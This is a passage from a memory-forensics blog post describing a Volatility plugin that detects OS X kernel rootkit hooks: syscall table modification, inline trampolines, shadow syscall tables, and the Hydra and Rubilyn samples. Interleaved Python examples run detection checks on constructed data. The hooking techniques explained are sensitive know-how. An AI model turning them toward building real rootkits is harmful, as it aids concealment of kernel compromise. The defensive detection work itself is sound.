<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdWdWPMrIcBnIqp4Esife85L8DgbNoZRlCDk7fIvxaguIV9R1qlXXAt4vdQUH0e5nJg-Tv3FMrTOwLevcJFWXFFjYwWmXPsCgyqBwzUI_sKjqYs2ZxXWzGbDS7iYMH4_DVo0AIkRJKrp9q/s1600/Screen+Shot+2013-07-13+at+9.19.15+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="15" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdWdWPMrIcBnIqp4Esife85L8DgbNoZRlCDk7fIvxaguIV9R1qlXXAt4vdQUH0e5nJg-Tv3FMrTOwLevcJFWXFFjYwWmXPsCgyqBwzUI_sKjqYs2ZxXWzGbDS7iYMH4_DVo0AIkRJKrp9q/s320/Screen+Shot+2013-07-13+at+9.19.15+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">DTrace syscall hooking detection</td></tr>
</tbody></table>
<b><br />- Replacing a Syscall with an External Function</b><br />
For this case I'll be using a Rubilyn infected memory sample provided by <a href="https://twitter.com/osxreverser" target="_blank">@osxreverser</a>, which can be found <a href="https://www.dropbox.com/s/8j4j8fuwniv7tm8/Mac%20OS%20X%2010.7%2064-bit-800c275a.vmem.tar.bz2" target="_blank">here</a>. This is not a new detection, but it's included for the sake of completeness. As a new feature to this detection, I've included the hook's destination <a href="https://developer.apple.com/library/mac/#documentation/Darwin/Conceptual/KEXTConcept/KEXTConceptIntro/introduction.html" target="_blank">kext (kernel extension)</a> in the output (<a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py#L132" target="_blank">check_hooks/findKextWithAddress</a> function). As pointed out in the <a href="http://volatility-labs.blogspot.com/2013/06/movp-ii-45-mac-volatility-vs-rubilyn.html" target="_blank">Volatility Blog</a>, this rootkit hooks three functions:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG6UKoLK0iKpcpsi7ACxuxPIFXQ1r9ypnUS7-_JzhurwmC8sHUWsWNyXDQUqNCr5m0KuW-ykbFxP0kTOiLpUTt7xU6WBOkBTOOo6AsKrfRlBgT8pOiFj-SuocezyGX3Txp-C7tqHEvjAi7/s1600/Screen+Shot+2013-07-13+at+9.25.38+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="21" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG6UKoLK0iKpcpsi7ACxuxPIFXQ1r9ypnUS7-_JzhurwmC8sHUWsWNyXDQUqNCr5m0KuW-ykbFxP0kTOiLpUTt7xU6WBOkBTOOo6AsKrfRlBgT8pOiFj-SuocezyGX3Txp-C7tqHEvjAi7/s320/Screen+Shot+2013-07-13+at+9.25.38+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Rubilyn hook detection</td></tr>
</tbody></table>
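The three table-level checks above (a duplicate handler, a handler whose name contains 'dtrace', and a handler that is not a kernel symbol, attributed to the kext that contains it) fit in a short stand-alone script. The following is an added example of my own, not code from the check_hooks plugin: it parses a constructed raw sysent array using the 40-byte layout shown in the "What's a Syscall Table?" section further down this page, then runs the three checks over it. The kernel and kext address ranges, the symbol addresses and the <code>_nosys</code>/<code>_enosys</code> allow-list (unimplemented syscall slots legitimately share one handler, which would otherwise look like duplicates) are constructed placeholders and assumptions.

```python
import struct

# Constructed address layout (placeholders, not values from any real memory sample).
KERNEL_BASE = 0xffffff8000200000
KERNEL_END = KERNEL_BASE + 0x800000
KEXTS = [  # (bundle id, start, end) of loaded kexts; constructed for the demo
    ("com.apple.driver.example", 0xffffff7f80a00000, 0xffffff7f80a20000),
    ("com.example.hook.placeholder", 0xffffff7f81000000, 0xffffff7f81008000),
]
SYSENT_SIZE = 40            # sizeof(struct sysent) on x64; sy_call is the pointer at offset 0x8
# Assumption: slots for unimplemented syscalls legitimately share one handler.
SHARED_OK = {"_nosys", "_enosys"}


def parse_sysent_table(raw, nsysent):
    """Read sy_call from each 40-byte sysent entry of a raw table image."""
    return [struct.unpack_from("<Q", raw, i * SYSENT_SIZE + 8)[0] for i in range(nsysent)]


def find_kext_with_address(addr):
    """Attribute a pointer to the loaded kext whose range contains it."""
    for name, start, end in KEXTS:
        if start <= addr < end:
            return name
    return None


def check_syscall_table(sy_calls, symbols):
    """symbols maps handler address -> kernel symbol name.
    Returns (index, address, kind, detail) findings for the three cases in the text."""
    findings, seen = [], {}
    for idx, addr in enumerate(sy_calls):
        name = symbols.get(addr)
        if name is None:
            # Handler is not a kernel symbol: report which kext (if any) it lives in.
            findings.append((idx, addr, "external", find_kext_with_address(addr) or "unknown"))
            continue
        if "dtrace" in name.lower():
            findings.append((idx, addr, "dtrace-hook", name))
        if addr in seen and name not in SHARED_OK:
            findings.append((idx, addr, "duplicate", "%s also at index %d" % (name, seen[addr])))
        seen.setdefault(addr, idx)
    return findings


def build_sample_table(sy_calls):
    """Pack constructed sy_call values into sysent entries with the remaining fields zeroed."""
    return b"".join(struct.pack("<hbbxxxxQQQIHxx", 1, 0, 0, a, 0, 0, 0, 0) for a in sy_calls)


# Constructed symbol addresses (kernel-range placeholders).
NOSYS, EXIT, FORK, READ = (KERNEL_BASE + o for o in (0x1000, 0x2000, 0x3000, 0x4000))
SETUID, DTRACE_SYSTRACE, OPEN = (KERNEL_BASE + o for o in (0x5000, 0x6000, 0x7000))
SYMBOLS = {NOSYS: "_nosys", EXIT: "_exit", FORK: "_fork", READ: "_read",
           SETUID: "_setuid", DTRACE_SYSTRACE: "_dtrace_systrace_syscall", OPEN: "_open"}


def run_demo():
    # Slot 4 (setuid) re-pointed at exit, slot 5 served by a DTrace-named handler,
    # slot 7 pointing into a kext; slot 6 is a second nosys and must not be flagged.
    table = [NOSYS, EXIT, FORK, READ, EXIT, DTRACE_SYSTRACE, NOSYS, 0xffffff7f81000400]
    sy_calls = parse_sysent_table(build_sample_table(table), len(table))
    return check_syscall_table(sy_calls, SYMBOLS)


if __name__ == "__main__":
    for idx, addr, kind, detail in run_demo():
        print("sysent[%d] %#x %-11s %s" % (idx, addr, kind, detail))
```

Running it reports slot 4 as a duplicate of slot 1, slot 5 as a DTrace hook and slot 7 as an external handler inside the placeholder kext, while the repeated nosys slot stays quiet. Against a real sample the symbol map and kext ranges would come from the profile and the loaded-kext list rather than the constants above.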
<h2>
Syscall Function Interception or Inlining</h2>
<div>
Currently it is not possible to detect an inlined syscall function with the Mac side of the Volatility Framework because it only checks for the direct modification of the syscall table. To be able to detect function inlining, I applied two techniques:</div>
<div>
<ol>
<li>Check the function's prologue for modification, which will be useful later as well</li>
<li>Check the function's control flow</li>
</ol>
<div>
Looking at the syscall function prologues, it can be seen that they contain the following:</div>
</div>
<pre><span style="font-size: x-small;">For x86:
PUSH RBP
MOV EBP, ESP
For x64:
PUSH RBP
MOV RBP, RSP</span></pre>
The volshell script I used to see this is below:<br />
<pre><span style="font-size: x-small;"># walk the sysent array and decode the first bytes of each syscall handler
import distorm3
nsysent = obj.Object("int", offset = self.addrspace.profile.get_symbol("_nsysent"), vm = self.addrspace)
sysents = obj.Object(theType = "Array", offset = self.addrspace.profile.get_symbol("_sysent"), vm = self.addrspace, count = nsysent, targetType = "sysent")
for (i, sysent) in enumerate(sysents):
    tgt_addr = sysent.sy_call.v()
    # symbol name of the handler, followed by its decoded prologue
    print self.addrspace.profile.get_symbol_by_address("kernel", tgt_addr)
    buf = self.addrspace.read(tgt_addr, 4)
    for op in distorm3.Decompose(tgt_addr, buf, distorm3.Decode64Bits):
        print op</span>
</pre>
<br />
The <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py#L216" target="_blank">check_hooks/isPrologInlined</a> function checks to see if the prologue conforms with these known instructions.<br />
<br />
The <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py#L254" target="_blank">check_hooks/isInlined</a> function, on the other hand, looks for calls, jumps or push/ret instructions that end up outside the kernel address space.<br />
<br />
If we use the check_hooks plugin on a memory sample with the inlined setuid syscall function that trampolines into the exit syscall function we get the following:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMDir4qGC6_-a-9-7lUU-4_CsUs7V-WUN73Yhrl2kjTz0UZ1_vPGcgEQuvjXgxYfOFHSzv1-6QmnVhgK_-qqzqQ3-hpAy1LYcGuiAR4Abuo9gkrGP8F91nVZwC31qWCAHplXtDpXS4DDzD/s1600/Screen+Shot+2013-07-13+at+9.47.55+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="16" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMDir4qGC6_-a-9-7lUU-4_CsUs7V-WUN73Yhrl2kjTz0UZ1_vPGcgEQuvjXgxYfOFHSzv1-6QmnVhgK_-qqzqQ3-hpAy1LYcGuiAR4Abuo9gkrGP8F91nVZwC31qWCAHplXtDpXS4DDzD/s320/Screen+Shot+2013-07-13+at+9.47.55+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Inlined Function (setuid) Detection</td></tr>
</tbody></table>
This example is interesting because it wouldn't be picked up by the isInlined function since the hook is within the kernel address space, but luckily I'm checking for function prologue modification, which flagged it.<br />
<br />
Another example of syscall inline hooking is <a href="http://siliconblade.blogspot.com/2013/05/checkdtrace-volatility-plugin-arises.html" target="_blank">DTrace fbt hooking</a>, which modifies the hooked function's prologue. The check_hooks plugin will detect the DTrace fbt probe that is monitoring the getdirentries64 syscall function as well:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjF4TpH1Z__NEJcoPPWX78gibvpN91k_c7tJGlfr8p-TAbu4x6aW2R6ua_SE_s2TwmtQ5ibmREUOQyyurNbvuPSEzrA2TOfsT5gFFrB7kUHbkkUrSz0vEuNXcmY5b7IA-xy7_1pDOYaT_9/s1600/Screen+Shot+2013-07-13+at+9.56.44+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="15" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjF4TpH1Z__NEJcoPPWX78gibvpN91k_c7tJGlfr8p-TAbu4x6aW2R6ua_SE_s2TwmtQ5ibmREUOQyyurNbvuPSEzrA2TOfsT5gFFrB7kUHbkkUrSz0vEuNXcmY5b7IA-xy7_1pDOYaT_9/s320/Screen+Shot+2013-07-13+at+9.56.44+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">DTrace fbt probe detection</td></tr>
</tbody></table>
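To make the two techniques concrete, here is an added example of my own (not the plugin's isPrologInlined/isInlined code) that applies both checks to constructed x64 function bytes: the prologue check compares the first four bytes against <code>push rbp; mov rbp, rsp</code>, and the control-flow check uses a minimal decoder that only understands the transfer forms named above (call/jmp rel32, <code>mov rax, imm64; jmp rax</code> and <code>push imm32; ret</code>) and reports targets that leave the kernel image. The three sample functions reproduce the cases discussed: a clean handler, the setuid-to-exit trampoline that only the prologue check catches because its target is inside the kernel, and a function with an intact prologue that later jumps into a kext, which only the control-flow check catches. KERNEL_BASE, KEXT_ADDR and the function addresses are placeholders.

```python
import struct

# Constructed address layout (placeholders, not values from any real memory sample).
KERNEL_BASE = 0xffffff8000200000
KERNEL_END = KERNEL_BASE + 0x800000
KEXT_ADDR = 0xffffff7f81000000                 # somewhere inside a loaded kext
EXPECTED_PROLOGUE = b"\x55\x48\x89\xe5"        # push rbp ; mov rbp, rsp


def is_prolog_inlined(code):
    """Prologue check: every x64 syscall function starts with the same two instructions."""
    return code[:4] != EXPECTED_PROLOGUE


def control_transfers(func_addr, code):
    """Minimal decoder for the transfer forms named in the text: call/jmp rel32,
    'mov rax, imm64 ; jmp rax' trampolines and 'push imm32 ; ret'. Linear scan."""
    i = 0
    while i < len(code):
        b = code[i]
        if b in (0xe8, 0xe9) and i + 5 <= len(code):
            disp = struct.unpack_from("<i", code, i + 1)[0]
            yield ("call" if b == 0xe8 else "jmp", func_addr + i + 5 + disp)
            i += 5
        elif code[i:i + 2] == b"\x48\xb8" and code[i + 10:i + 12] == b"\xff\xe0":
            yield ("mov rax/jmp rax", struct.unpack_from("<Q", code, i + 2)[0])
            i += 12
        elif b == 0x68 and code[i + 5:i + 6] == b"\xc3":
            imm = struct.unpack_from("<i", code, i + 1)[0]      # push imm32 sign-extends
            yield ("push/ret", imm & 0xffffffffffffffff)
            i += 6
        else:
            i += 1


def is_inlined(func_addr, code):
    """Control-flow check: any transfer whose target leaves the kernel image is a hook."""
    return [(kind, tgt) for kind, tgt in control_transfers(func_addr, code)
            if not (KERNEL_BASE <= tgt < KERNEL_END)]


def check_function(func_addr, code):
    return {"prologue_modified": is_prolog_inlined(code),
            "external_transfers": is_inlined(func_addr, code)}


def jmp_rel32(instr_addr, target):
    """Assemble 'jmp rel32' at instr_addr reaching target (constructed test input)."""
    return b"\xe9" + struct.pack("<i", target - (instr_addr + 5))


SETUID_ADDR = KERNEL_BASE + 0x60910      # placeholder for _setuid
EXIT_ADDR = KERNEL_BASE + 0x55430        # placeholder for _exit
# Three constructed function images:
CLEAN = b"\x55\x48\x89\xe5\x31\xc0\x5d\xc3"      # push rbp; mov rbp,rsp; xor eax,eax; pop rbp; ret
TRAMPOLINE = b"\x48\xb8" + struct.pack("<Q", EXIT_ADDR) + b"\xff\xe0"   # in-kernel setuid -> exit
PROLOGUE_OK_THEN_KEXT = EXPECTED_PROLOGUE + jmp_rel32(SETUID_ADDR + 4, KEXT_ADDR)


def run_demo():
    return {"clean": check_function(SETUID_ADDR, CLEAN),
            "trampoline": check_function(SETUID_ADDR, TRAMPOLINE),
            "kext": check_function(SETUID_ADDR, PROLOGUE_OK_THEN_KEXT)}


if __name__ == "__main__":
    for label, result in run_demo().items():
        print(label, result)
```

The decoder deliberately skips over the immediate of a matched trampoline so that bytes of the embedded address are not misread as a second instruction; a production check would hand the bytes to a real disassembler such as distorm3, as the plugin does.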
<h2>
Patched Syscall Handler or Shadow Syscall Table</h2>
<div>
The shadowing of the syscall table is a technique that hides the attacker's modifications to the syscall table by creating a copy of it to modify and by keeping the original untouched as discussed in my <a href="http://siliconblade.blogspot.com/2013/07/offensive-volatility-messing-with-os-x.html" target="_blank">previous post</a>.<br />
<br />
The detection implemented in the <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py#L153" target="_blank">check_hooks/isSyscallShadowed</a> function works as follows:<br />
<br />
<ol>
<li>Check functions known to have references to the syscall table. In this case the functions are unix_syscall_return, unix_syscall64, unix_syscall.</li>
<li>Disassemble them to find the syscall table references.</li>
<li>Obtain the references in the function and compare to the address in the symbols table.</li>
</ol>
<div>
After running the attack code sample for the shadow syscall table attack, I ran the check_hooks plugin against the memory sample and received the following output that included hits for the shadow syscall table:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyKSewmdMH4Tylluq68_GCNjqkIZeMlHzte688DRMww_zqR9lPUffNu0kQEdQTjqVp03xqNLCLjK5xAmszbLPXqwSGXfxJMFwslwQz-AEtKz-lrOxaPYbxT52x6FCFknr78JrYt66d70x8/s1600/Screen+Shot+2013-07-13+at+10.30.26+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyKSewmdMH4Tylluq68_GCNjqkIZeMlHzte688DRMww_zqR9lPUffNu0kQEdQTjqVp03xqNLCLjK5xAmszbLPXqwSGXfxJMFwslwQz-AEtKz-lrOxaPYbxT52x6FCFknr78JrYt66d70x8/s320/Screen+Shot+2013-07-13+at+10.30.26+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Shadow syscall table detection</td></tr>
</tbody></table>
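The three steps above can be demonstrated without a full disassembler. The following is an added example of my own, not the plugin's isSyscallShadowed code: it scans a function's bytes for RIP-relative <code>lea</code>/<code>mov reg, [rip+disp32]</code> references (the form a compiler emits for a global like sysent in a high-memory kernel), resolves each to an absolute address, and compares the result with the <code>_sysent</code> symbol address. A function that is known to index sysent but no longer references it, or that references a table outside the kernel image, is reported together with the diverted target. All addresses are constructed placeholders, and the byte scan can in principle match inside an immediate, so the plugin's disassembler-based approach is the safer one on real samples.

```python
import struct

# Constructed address layout (placeholders, not values from any real memory sample).
KERNEL_BASE = 0xffffff8000200000
KERNEL_END = KERNEL_BASE + 0x800000
SYSENT_ADDR = KERNEL_BASE + 0x400000      # stands in for the _sysent symbol address
KEXT_ADDR = 0xffffff7f81000000            # stands in for a copy of the table hosted in a kext
FUNC_ADDR = KERNEL_BASE + 0x100000        # stands in for unix_syscall64


def rip_relative_refs(func_addr, code):
    """Step 2: find REX.W LEA/MOV reg, [rip+disp32] (48/4c 8d|8b, modrm mod=00 rm=101)
    and resolve each to its absolute target. Linear byte scan, not a full disassembler."""
    refs = []
    for i in range(len(code) - 6):
        rex, op, modrm = code[i], code[i + 1], code[i + 2]
        if rex in (0x48, 0x4c) and op in (0x8d, 0x8b) and (modrm & 0xc7) == 0x05:
            disp = struct.unpack_from("<i", code, i + 3)[0]
            refs.append((func_addr + i, func_addr + i + 7 + disp))   # RIP = next instruction
    return refs


def is_syscall_shadowed(func_addr, code, sysent_addr=SYSENT_ADDR):
    """Step 3: a function known to index sysent must still reference the symbol's address.
    Returns (shadowed, suspicious_targets); targets outside the kernel image are listed."""
    targets = [t for _, t in rip_relative_refs(func_addr, code)]
    suspects = [t for t in targets if not (KERNEL_BASE <= t < KERNEL_END)]
    return (sysent_addr not in targets or bool(suspects), suspects)


def lea_rax_rip(instr_addr, target):
    """Assemble 'lea rax, [rip+disp32]' at instr_addr reaching target (constructed test input)."""
    return b"\x48\x8d\x05" + struct.pack("<i", target - (instr_addr + 7))


# Constructed stand-ins for the table reference inside unix_syscall64: prologue, reference, ret.
CLEAN = b"\x55\x48\x89\xe5" + lea_rax_rip(FUNC_ADDR + 4, SYSENT_ADDR) + b"\xc3"
SHADOWED = b"\x55\x48\x89\xe5" + lea_rax_rip(FUNC_ADDR + 4, KEXT_ADDR) + b"\xc3"

if __name__ == "__main__":
    for label, code in (("clean", CLEAN), ("shadowed", SHADOWED)):
        print(label, is_syscall_shadowed(FUNC_ADDR, code))
```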
<div>
<br /></div>
<div>
It looks like I have covered the detection of the examples in my previous post, but I'm not done!</div>
</div>
<h2>
Bonus! Scanning Functions in Kernel/Kext Symbol Tables</h2>
<div>
Now that I have the tools to detect function modifications, I decided to check on the functions in the rest of the kernel and kernel extensions. To be able to accomplish this task, I had to obtain the list of symbols per kernel or kext since the Volatility Framework is currently not able to list kernel or kext symbols from a memory sample.<br />
<br />
I followed these steps in the <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py#L43" target="_blank">check_hooks/getKextSymbols</a> function:<br />
<br />
<ol>
<li>Get the Mach-o header (e.g. mach_header_64) to get the start of segments.</li>
<li>Locate the __LINKEDIT segment to get the address for the list of symbols represented as nlist_64 structs, symbols file size and offsets.</li>
<li>Locate the segment with the LC_SYMTAB command to get the symbols and strings offsets, which will be used to...</li>
<li>Calculate the location of the symbols in __LINKEDIT.</li>
<li>Once we know the exact address, loop through the nlist structs to get the symbols.</li>
<li>Also find the number of the __TEXT segment's __text section number, which will be used to filter out symbols. According to <a href="https://developer.apple.com/library/mac/#documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html" target="_blank">Apple's documentation</a> the compiler places only executable code in this section. </li>
</ol>
<div>
The nlist structs have a member called n_sect, which stores the section number that the symbol's code lives in. This value, in conjunction with the __text section's number helped in narrowing down the list of symbols to mostly functions' symbols. I say mostly because I have seen structures, such as <a href="http://fxr.watson.org/fxr/source/bsd/kern/mach_header.c?v=xnu-792.6.70" target="_blank">_mh_execute_header</a> still listed.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXG525-jxBj5Ju2B-dku7QQ8dxl_BZoKVWZm8D2M1XAUEmgyV-mJ0VW9zVB02LHX5BtZPWmT9FEiqEFJeIKaGy2q-Y-kcpcY8KC5NBCwagr5KIz1Cnw018MfhlR9kv70rIsjiavZdCPP1O/s1600/Screen+Shot+2013-07-13+at+11.09.58+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="59" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXG525-jxBj5Ju2B-dku7QQ8dxl_BZoKVWZm8D2M1XAUEmgyV-mJ0VW9zVB02LHX5BtZPWmT9FEiqEFJeIKaGy2q-Y-kcpcY8KC5NBCwagr5KIz1Cnw018MfhlR9kv70rIsjiavZdCPP1O/s320/Screen+Shot+2013-07-13+at+11.09.58+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Some test output for kernel symbols</td></tr>
</tbody></table>
</div>
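The six steps above, as an added stand-alone example of my own rather than the plugin's getKextSymbols code. It reads a Mach-O image through a minimal stand-in for Volatility's address space, walks the load commands to find __LINKEDIT, LC_SYMTAB and the number of the __TEXT,__text section (section numbers count across all segments, starting at 1), translates the symtab file offsets into memory using the __LINKEDIT vmaddr/fileoff pair, and keeps only nlist_64 entries whose n_sect matches __text. The image it parses is constructed in memory with struct: a __TEXT segment with __text and __const, a __LINKEDIT segment whose file offset deliberately differs from where it sits in memory, and four symbols, one of which (_sysent, placed in __const) must be filtered out and one of which (__mh_execute_header) survives the filter exactly as noted above. The load address is a placeholder.

```python
import struct

MH_MAGIC_64 = 0xfeedfacf
LC_SEGMENT_64 = 0x19
LC_SYMTAB = 0x2


class FlatAddressSpace:
    """Stand-in for Volatility's address space: one bytes image mapped at `base`."""
    def __init__(self, base, image):
        self.base, self.image = base, image

    def read(self, addr, n):
        off = addr - self.base
        if off < 0 or off + n > len(self.image):
            raise ValueError("read outside image: %#x" % addr)
        return self.image[off:off + n]


def get_kext_symbols(space, header_addr):
    """Return {name: address} for symbols whose code lives in __TEXT,__text."""
    magic, _, _, _, ncmds, _, _, _ = struct.unpack("<8I", space.read(header_addr, 32))
    if magic != MH_MAGIC_64:
        raise ValueError("not a 64-bit Mach-O header")
    linkedit = symtab = text_sect = None
    sect_no, cmd_addr = 0, header_addr + 32
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack("<2I", space.read(cmd_addr, 8))
        if cmd == LC_SEGMENT_64:
            seg = space.read(cmd_addr, 72)
            segname = seg[8:24].rstrip(b"\0").decode()
            vmaddr, vmsize, fileoff, filesize = struct.unpack_from("<4Q", seg, 24)
            nsects = struct.unpack_from("<I", seg, 64)[0]
            if segname == "__LINKEDIT":
                linkedit = (vmaddr, fileoff)
            for s in range(nsects):            # section numbers run across all segments, from 1
                sect_no += 1
                sect = space.read(cmd_addr + 72 + 80 * s, 80)
                if segname == "__TEXT" and sect[:16].rstrip(b"\0") == b"__text":
                    text_sect = sect_no
        elif cmd == LC_SYMTAB:
            symtab = struct.unpack("<6I", space.read(cmd_addr, 24))[2:]  # symoff, nsyms, stroff, strsize
        cmd_addr += cmdsize
    if None in (linkedit, symtab, text_sect):
        raise ValueError("missing __LINKEDIT, LC_SYMTAB or __TEXT,__text")
    le_vmaddr, le_fileoff = linkedit
    symoff, nsyms, stroff, strsize = symtab
    # A file offset inside __LINKEDIT maps to memory as vmaddr + (offset - fileoff).
    sym_addr = le_vmaddr + (symoff - le_fileoff)
    strings = space.read(le_vmaddr + (stroff - le_fileoff), strsize)
    symbols = {}
    for i in range(nsyms):
        n_strx, n_type, n_sect, n_desc, n_value = struct.unpack("<IBBHQ", space.read(sym_addr + 16 * i, 16))
        if n_sect != text_sect:
            continue                            # data, absolute or undefined symbol: skip
        symbols[strings[n_strx:strings.index(b"\0", n_strx)].decode()] = n_value
    return symbols


def build_sample_image(base):
    """Constructed minimal 64-bit Mach-O (not a real kernel or kext) laid out at `base`."""
    text_addr, le_addr, le_fileoff = base + 0x1000, base + 0x2000, 0x8000
    strtab = b"\0_setuid\0_exit\0_sysent\0__mh_execute_header\0"
    strx = lambda name: strtab.index(b"\0" + name + b"\0") + 1
    nlist = [(b"_setuid", 1, text_addr + 0x10), (b"_exit", 1, text_addr + 0x40),
             (b"_sysent", 2, text_addr + 0x800),        # lives in __const: filtered out
             (b"__mh_execute_header", 1, base)]         # not a function, but still in __text
    symtab = b"".join(struct.pack("<IBBHQ", strx(n), 0x0f, sect, 0, val) for n, sect, val in nlist)

    def segment(name, vmaddr, vmsize, fileoff, filesize, sects):
        out = struct.pack("<2I16sQQQQiiII", LC_SEGMENT_64, 72 + 80 * len(sects), name,
                          vmaddr, vmsize, fileoff, filesize, 7, 5, len(sects), 0)
        for sname, addr, size, off in sects:
            out += struct.pack("<16s16sQQIIIIIIII", sname, name, addr, size, off, 0, 0, 0, 0, 0, 0, 0)
        return out

    cmds = segment(b"__TEXT", base, 0x2000, 0, 0x2000,
                   [(b"__text", text_addr, 0x800, 0x1000), (b"__const", text_addr + 0x800, 0x800, 0x1800)])
    cmds += segment(b"__LINKEDIT", le_addr, 0x1000, le_fileoff, len(symtab) + len(strtab), [])
    cmds += struct.pack("<6I", LC_SYMTAB, 24, le_fileoff, len(nlist), le_fileoff + len(symtab), len(strtab))
    header = struct.pack("<8I", MH_MAGIC_64, 0x01000007, 3, 2, 3, len(cmds), 0, 0)
    image = bytearray(0x3000)
    image[0:len(header) + len(cmds)] = header + cmds
    image[0x2000:0x2000 + len(symtab) + len(strtab)] = symtab + strtab
    return bytes(image)


BASE = 0xffffff8000200000     # constructed placeholder load address


def run_demo(base=BASE):
    return get_kext_symbols(FlatAddressSpace(base, build_sample_image(base)), base)


if __name__ == "__main__":
    for name, addr in sorted(run_demo().items()):
        print("%#x %s" % (addr, name))
```

The symbol addresses this returns are what the hook checks consume next; on a real sample the stand-in address space would be replaced by the profile's address space and the header address by the kernel's or the kext's load address.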
The next step is to use the addresses obtained from the filtered symbol table to check for hooks.<br />
<br />
Quick note: while the syscall functions had identical prologues, other functions in the symbol table, such as bcopy, have different ones. Using the isPrologInlined function on them therefore produces false positives, which left me with the isInlined function to detect hooks.<br />
<br />
My target for this case is an OS X 10.8.3 VM running <a href="https://github.com/gdbinit/hydra" target="_blank">Hydra</a>, a kernel extension that intercepts a process's creation, suspends it, and communicates it to a userland daemon, which was written by @osxreverser. Hydra <a href="https://github.com/gdbinit/hydra/blob/master/hydra/hydra/hydra.c" target="_blank">inline hooks</a> the function proc_resetregister in order to achieve its first goal. After compiling and loading the kext, I ran the check_hooks plugin with the -K option to only scan the kernel symbols to see what's detected:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik_9jx2jCE2N0y9vlGlVtJZLmzHhjqMnKBRd4hWHv1ulrZIs34KZlvBkl3Quoq-nS1NfF0vj1c6JearEiKic3EgwQcDOE_2HOBtCuj3qEhMwiKWDyAoxBQ9trr5Je9UaHn6rB1udXHFgOf/s1600/Screen+Shot+2013-07-13+at+11.52.10+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="16" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik_9jx2jCE2N0y9vlGlVtJZLmzHhjqMnKBRd4hWHv1ulrZIs34KZlvBkl3Quoq-nS1NfF0vj1c6JearEiKic3EgwQcDOE_2HOBtCuj3qEhMwiKWDyAoxBQ9trr5Je9UaHn6rB1udXHFgOf/s320/Screen+Shot+2013-07-13+at+11.52.10+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Hydra hook detection</td></tr>
</tbody></table>
As seen in the screenshot, the plugin detects the function proc_resetregister as inline hooked and shows that the destination of the hook is in the 'put.as.hydra' kext. The other plugin specific option -X will scan all kexts' symbols, if available, for hooking.<br />
<br />
Note: Most testing was performed on OS X 10.7.5 x64 and 10.8.3 x64. Feedback about outcomes on other OS X versions would be appreciated.<br />
<h2>
Conclusion</h2>
<div>
With the check_hooks plugin, now it's possible to detect hooked functions in the syscall table and kext symbols besides a shadow syscall table. While this is great, it doesn't end here. In my next post I'll be exploring OS X IDT hooks so stay tuned!</div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-54509115006637761652013-07-02T21:54:00.001-07:002013-07-22T08:29:02.832-07:00Offensive Volatility: Messing with the OS X Syscall Table<h2>
Summary</h2>
